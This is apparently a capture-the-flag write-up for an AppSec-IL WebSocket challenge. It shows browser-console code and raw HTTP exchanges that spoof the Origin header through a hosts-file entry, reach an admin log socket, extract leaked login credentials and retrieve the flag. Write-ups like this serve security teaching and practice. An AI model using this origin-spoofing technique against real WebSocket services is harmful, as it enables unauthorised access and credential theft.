Tags: ws websocket 

Look at this file: `https://badroute.appsecil.ctf.today/main.b8c73a19106d54f04466.js`

You can see:

```js
connect(){new WebSocket("wss://securityocean.corp.local/admin/log")}
```

So we try to open the WebSocket from the browser console:

```js
const s = new WebSocket('wss://badroute.appsecil.ctf.today/admin/log')
```

Server response:

```
HTTP/1.1 101 Switching Protocols
upgrade: websocket
connection: Upgrade
sec-websocket-accept: +ZA/4NNH14vcfGv+BZhGv7gAwkY=

{"error":"Bad origin provided, abort connection. Expect: ['securityocean.corp.local']"}
```

So clearly the server only checks the `Origin` header. We add `securityocean.corp.local` to the hosts file, pointing it at the same IP, open `https://securityocean.corp.local` in the browser, and run:

```js
const s = new WebSocket('wss://badroute.appsecil.ctf.today/admin/log')
```

The request now looks like this (note the `Origin` header):

```
GET /admin/log HTTP/1.1
Host: badroute.appsecil.ctf.today
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Upgrade: websocket
Origin: https://securityocean.corp.local
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Sec-WebSocket-Key: vrVtVO/AoKcH2erLfbgkTQ==
```

Server response:

```
{"msg":{"email":"[email protected]","pass":"tSec43PasswordLivna "},"error":"Incorrect username or password."}
```

Using these credentials to log in at `https://badroute.appsecil.ctf.today/login`, we get the flag:

```
{"msg":"Congrats! Your Flag is AppSec-IL{Th3_W3bS0ckets_N33ds_2BS3cre}","status":200}
```